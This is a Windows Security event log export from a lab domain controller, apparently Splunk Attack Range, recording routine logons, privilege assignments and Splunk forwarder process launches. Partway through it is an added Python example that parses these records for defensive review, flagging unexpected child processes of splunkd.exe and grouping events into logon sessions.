RecordNumber=263762
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x756A66
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51488
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:24:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263761
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x756A66
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:25:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263765
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1884
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:25:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263764
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15d8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:25:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263766
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1500
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:25:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263767
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:25:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263768
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x106c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:25:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263770
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b6c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:25:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263769
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1548
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:25:38 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263771
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752E7B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:25:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263774
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x75B50A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:25:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263773
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x75B50A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51502
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:25:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263772
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x75B50A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
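The Token Elevation Type note on the 4688 records above and the Logon ID note on the 4624/4634 records describe fields that are easier to check programmatically than by eye. The Python below is an added example, not part of this log and not Splunk's own tooling: it parses records in this classic WinEventLog layout, decodes Token Elevation Type (%%1936, %%1937 and %%1938 are the message-table references behind types 1, 2 and 3), flags children of splunkd.exe that live outside the forwarder's bin directory, and stitches 4624, 4672 and 4634 records into one session per Logon ID whatever order they were written in (the 4634 at 02:25:55 precedes its 4624 in this dump). The allow-listed directory and the cmd.exe record are assumptions made for the example; SAMPLE is a constructed, abbreviated copy of the records on this page.

```python
"""Parse Splunk-forwarded Windows Security events (classic WinEventLog layout), decode
4688 Token Elevation Types, flag unexpected children of splunkd.exe, and stitch
4624/4672/4634 records into logon sessions keyed on Logon ID."""
import re
from collections import defaultdict
from datetime import datetime

TS_RE = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M$")
SECTION_RE = re.compile(r"^([A-Za-z][A-Za-z ]+):$")               # "Creator Subject:"
KV_RE = re.compile(r"^([A-Za-z][A-Za-z0-9 ()\-]{0,50}):\s*(.*)$")  # "Logon ID: 0x3E7"
# %%1936..%%1938 are the message-table references behind Token Elevation Type 1..3
ELEVATION = {"%%1936": 1, "%%1937": 2, "%%1938": 3}
# Assumption for unexpected_children(): every child of splunkd.exe lives in its bin dir
FORWARDER_BIN = "c:\\program files\\splunkuniversalforwarder\\bin\\"
SPLUNKD = r"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"

# Constructed sample, abbreviated from the records above; the cmd.exe record is invented
# so the check has something to flag, and one prose line is kept to show it is skipped.
SAMPLE = r"""04/19/2021 02:25:08 PM
EventCode=4688
Process Information:
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Token Elevation Type indicates the type of token that was assigned to the new process.
04/19/2021 02:25:09 PM
EventCode=4688
Process Information:
New Process Name: C:\Windows\System32\cmd.exe
Token Elevation Type: %%1937
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
04/19/2021 02:25:55 PM
EventCode=4634
Subject:
Logon ID: 0x75B50A
04/19/2021 02:25:55 PM
EventCode=4624
New Logon:
Account Name: WIN-DC-209$
Logon ID: 0x75B50A
Network Information:
Source Network Address: ::1
04/19/2021 02:25:55 PM
EventCode=4672
Subject:
Logon ID: 0x75B50A
Privileges: SeSecurityPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
"""

def parse_events(text):
    """One dict per timestamp-delimited record: header key=value pairs at top level, body
    'Key: Value' lines as 'Section.Key', single-token lines continuing the previous key."""
    events, cur, section, last_key = [], None, "", None
    for line in (l.strip() for l in text.splitlines()):
        if TS_RE.match(line):
            cur = {"time": datetime.strptime(line, "%m/%d/%Y %I:%M:%S %p"), "fields": {}}
            events.append(cur)
            section, last_key = "", None
        elif cur is None or not line:
            continue
        elif "=" in line and " " not in line.split("=", 1)[0]:   # header line
            key, val = line.split("=", 1)
            cur[key] = val
        elif SECTION_RE.match(line):
            section = line[:-1]
        elif m := KV_RE.match(line):
            last_key = f"{section}.{m.group(1)}" if section else m.group(1)
            cur["fields"][last_key] = m.group(2).strip()
        elif last_key and " " not in line:                        # e.g. SeDebugPrivilege
            cur["fields"][last_key] += " " + line                 # prose lines fall through
    return events

def unexpected_children(events, parent=SPLUNKD):
    """(child path, decoded elevation type) for 4688s spawned by `parent` outside FORWARDER_BIN."""
    hits = []
    for ev in (e for e in events if e.get("EventCode") == "4688"):
        f = ev["fields"]
        child = f.get("Process Information.New Process Name", "")
        if (f.get("Process Information.Creator Process Name", "").lower() == parent.lower()
                and not child.lower().startswith(FORWARDER_BIN)):
            hits.append((child, ELEVATION.get(f.get("Process Information.Token Elevation Type"))))
    return hits

def logon_sessions(events):
    """Merge 4624 (New Logon.Logon ID) with 4672 and 4634 (Subject.Logon ID) per Logon ID,
    whatever order the records were written in."""
    sessions = defaultdict(dict)
    for ev in events:
        code, f = ev.get("EventCode"), ev["fields"]
        if code == "4624":
            sessions[f["New Logon.Logon ID"].lower()].update(
                logon=ev["time"], account=f["New Logon.Account Name"],
                source=f["Network Information.Source Network Address"])
        elif code == "4672":
            sessions[f["Subject.Logon ID"].lower()]["privileges"] = f["Subject.Privileges"].split()
        elif code == "4634":
            sessions[f["Subject.Logon ID"].lower()]["logoff"] = ev["time"]
    return dict(sessions)
```

Run against the sample, unexpected_children() returns only the constructed cmd.exe record with elevation type 2, and logon_sessions() yields a single session for 0x75B50A whose logon and logoff timestamps are equal and which carries the three privileges from its 4672. Logon IDs are reused across reboots, so when applying this to a multi-day export, key sessions on (ComputerName, boot, Logon ID) rather than Logon ID alone.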
04/19/2021 02:26:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263776
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19ec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:26:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263775
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf50
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:26:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263777
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xea8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:26:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263778
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1620
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:26:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263779
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9a8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:26:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263781
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:26:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
